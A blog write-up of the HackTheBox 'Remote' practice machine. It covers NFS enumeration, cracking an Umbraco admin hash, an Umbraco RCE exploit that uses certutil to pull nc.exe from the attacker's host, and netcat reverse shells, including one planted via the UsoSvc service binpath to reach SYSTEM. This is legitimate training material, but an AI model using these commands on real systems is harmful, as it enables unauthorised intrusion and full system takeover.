Ajdin's blog Tags Github RSS

HackTheBox Remote Write Up w/o Metasploit

18 Aug 2020

This is an easy Windows box by mrb3n. For initial foothold we need to find and crack creds found in NFS and use them in an exploit so we can get RCE. After that we need PowerUp.ps1 powershell script to exploit a Windows Service so we can elevate privileges to nt authority\system. If you have any questions you can find me on Twitter @ajdintrejic.

Reconnaissance

Let’s do a quick nmap scan.

nmap -sC -sV -O -oA nmap/initial 10.10.10.180

Quick explanation:

Results:

## nmapNmap scan report for 10.10.10.180 (10.10.10.180)
Host is up (1.0s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Aggressive OS guesses: Microsoft Windows Server 2016 (93%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2008 SP2 (89%), Microsoft Windows Vista SP1 (88%), Microsoft Windows Server 2012 R2 Update 1 (87%), Microsoft Windows 7 SP1 (87%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (87%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 4m24s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-13T14:30:50
|_  start_date: N/AOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 635.59 seconds

A quick look at the ports:

Enumeration

On port 80 we have this website running:

With gobuster I found remote.htb/install:

This is an Umbraco CMS, which can be identified by looking at the URL as it changes from remote.htb/install to remote.htb/umbraco/#/login/sda.

Getting user

Googling around I’ve found an RCE exploit for Umbraco but I need creds for that:

So let’s look around for creds.

I was a bit lost with how to exploit NFS but I got some info from here.

RPC and NFS ENUMERATION

Connect to an RPC share without a username and password and enumerate privledges rpcclient –user=”” –command=enumprivs -N $ip Connect to an RPC share with a username and enumerate privledges rpcclient –user=”” –command=enumprivs $ip Rpcinfo: What services are running? Rpcinfo -p rpcdump.py An application that communicates with the Endpoint Mapper interface from the DCE/RPC suite. This can be used to list services that are remotely available through DCE/RPC.

NFS (Network File System) Enumeration Show Mountable NFS Shares nmap -sV –script=nfs-showmount $ip root@mylo:~# showmount -h root@mylo:~# showmount -e %ipaddrs

Connecting without an username and password is not possible on this box, so I tried mounting nfs.

kali@kali:~/htb/remote$ sudo mount -t nfs 10.10.10.180:/site_backups /home/kali/htb/remote/nfs
[sudo] password for kali: 
kali@kali:~/htb/remote$ cd nfs
kali@kali:~/htb/remote/nfs$ ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

Boom, we got some info, after enumerating I found a file called Umbraco.sdf which unfortunately can’t be opened on Linux, I tried converting it to other types of formats with some online tools but none of them worked. But here comes the knowledge of other CTFs into play. We can search for strings in the file with an Unix tool called strings. The output is kinda big so I piped it to less.

strings Umbraco.sdf | less[...]
Administrator admin b8be16afba8c314ad33d812f22a04991b90e2aaa {"hashAlgorithm":"SHA1"} en-US f8512f97-cab1-4a4b-a49f-0a2054c47a1d
admin admin@htb.local b8be16afba8c314ad33d812f22a04991b90e2aaa {"hashAlgorithm":"SHA1"} admin@htb.local en-US feb1a998-d3bf-406a-b30b-e269d7abdf50
admin admin@htb.local b8be16afba8c314ad33d812f22a04991b90e2aaa {"hashAlgorithm":"SHA1"} admin@htb.local en-US82756c26-4321-4d27-b429-1b5c7c4f882f
smith smith@htb.local jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts= {"hashAlgorithm":"HMACSHA256"} smith@htb.local en-US 7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmith smith@htb.local jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts= {"hashAlgorithm":"HMACSHA256"} smith@htb.local en-US 7e39df83-5e64-4b93-9702-ae257a9b9749
ssmith ssmith@htb.local 8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA= {"hashAlgorithm":"HMACSHA256"} ssmith@htb.local en-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
[...]

This could have also been found with strings Umbraco.sdf | grep -i hash, and you could have replaced hash with something like password, sha, admin, etc.

The other hashes I coudn’t crack but I cracked the admin one.

admin:baconandcheese

Now we got the creds, let’s try to login.

Inside of this CMS we can’t do anything except run that exploit I found before: Umraco Reverse Code Execution.

Getting a reverse shell

To get a reverse shell I had to transfer Netcat for Windows to the box:

  1. Start a local python server for transfering nc.exe:
kali@kali:~/Downloads/netcat-1.11$ sudo python3 -m http.server 101
[sudo] password for kali: 
Serving HTTP on 0.0.0.0 port 101 (http://0.0.0.0:101/) ...
10.10.10.180 - - [14/Jul/2020 12:40:15] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.180 - - [14/Jul/2020 12:40:15] "GET /nc.exe HTTP/1.1" 200 -
  1. Grab it from the box using the exploit:
kali@kali:~/htb/remote$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180/' -c powershell.exe -a '-NoProfile -Command certutil -urlcache -split -f http://10.10.14.243:101/nc.exe c:/windows/temp/nc.exe'
****  Online  ****
  0000  ...
  8eb0
CertUtil: -URLCache command completed successfully.
  1. Start a reverse shell listener on your local machine:
kali@kali:~/htb/remote$ sudo nc -lvnp 102
[sudo] password for kali: 
listening on [any] 102 ...
  1. Execute nc to connect back to you
kali@kali:~/htb/remote$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180/' -c powershell.exe -a '-NoProfile -Command c:/windows/temp/nc.exe 10.10.14.243 102 -e cmd.exe'

After that we should gain a connection on our reverse shell listener:

kali@kali:~/htb/remote$ sudo nc -lvnp 102
[sudo] password for kali: 
listening on [any] 102 ...
connect to [10.10.14.243] from (UNKNOWN) [10.10.10.180] 49744
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.C:\windows\system32\inetsrv>

And this is how I got user flag.


Getting nt authority\system (root)

Privilege escalation

I transfered winPEAS.exe on the machine to C:\Windows\Temp. When I ran it, it found multiple exploits.

Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
    OS Build Number: 17763
       [!] CVE-2019-0836 : VULNERABLE
        [>] https://exploit-db.com/exploits/46718
        [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

       [!] CVE-2019-0841 : VULNERABLE
       [>] https://github.com/rogue-kdc/CVE-2019-0841
       [>] https://rastamouse.me/tags/cve-2019-0841/

       [!] CVE-2019-1064 : VULNERABLE
       [>] https://www.rythmstick.net/posts/cve-2019-1064/

       [!] CVE-2019-1130 : VULNERABLE
       [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear 

       [!] CVE-2019-1253 : VULNERABLE
       [>] https://github.com/padovah4ck/CVE-2019-1253

       [!] CVE-2019-1315 : VULNERABLE
       [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

       [!] CVE-2019-1385 : VULNERABLE
       [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

       [!] CVE-2019-1388 : VULNERABLE
       [>] https://github.com/jas502n/CVEC:\Users\Public>
-2019-1388

       [!] CVE-2019-1405 : VULNERABLE
       [>] https://www.nccgroup.trust/uk/about-C:\Users\Public>
us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/

    Finished. Found 9 potential vulnerabilities.

I looked at all of them and then, as I wasn’t familiar with Windows, I had no idea what to do next. There were some mentions in these about some services being vulnerable. Luckly I found this PowerUp.ps1 powershell script which can escalate privileges as noted below.

PowerUp is the result of wanting a clean way to audit client systems for common Windows privilege escalation vectors. It utilizes various service abuse checks, .dll hijacking opportunities, registry checks, and more to enumerate common ways that you might be able to elevate on a target system.

So I transfered it to the server, entered powershell and imported the script:

PS C:\windows\temp> Import-Module c:\windows\temp\PowerUp.ps1
Import-Module c:\windows\temp\PowerUp.ps1
PS C:\windows\temp>

So this script/service exploit allows us to run a command as nt authority/system so I just started another nc listener on my machine and executed nc.exe on this box with elevated privileges.

PS C:\windows\temp> sc.exe stop UsoSvc
sc.exe stop UsoSvc
[SC] ControlService FAILED 1062:

The service has not been started.

PS C:\windows\temp> sc.exe config UsoSvc binpath= "c:\windows\temp\nc.exe 10.10.14.243 4444 -e cmd.exe"           
sc.exe config UsoSvc binpath= "c:\windows\temp\nc.exe 10.10.14.243 4444 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\windows\temp> sc.exe qc usosvc
sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\windows\temp\nc.exe 10.10.14.243 4444 -e cmd.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
PS C:\windows\temp> sc.exe start UsoSvc
sc.exe start UsoSvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

PS C:\windows\temp>

and on my reverse shell listener:

kali@kali:~/htb/remote$ sudo nc -lvnp 4444
[sudo] password for kali: 
listening on [any] 4444 ...
connect to [10.10.14.243] from (UNKNOWN) [10.10.10.180] 49781
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

Lessons learned

(Some of this might be n00b knowledge but this was my first Windows box)

ftp powerup.ps1 rpc umbraco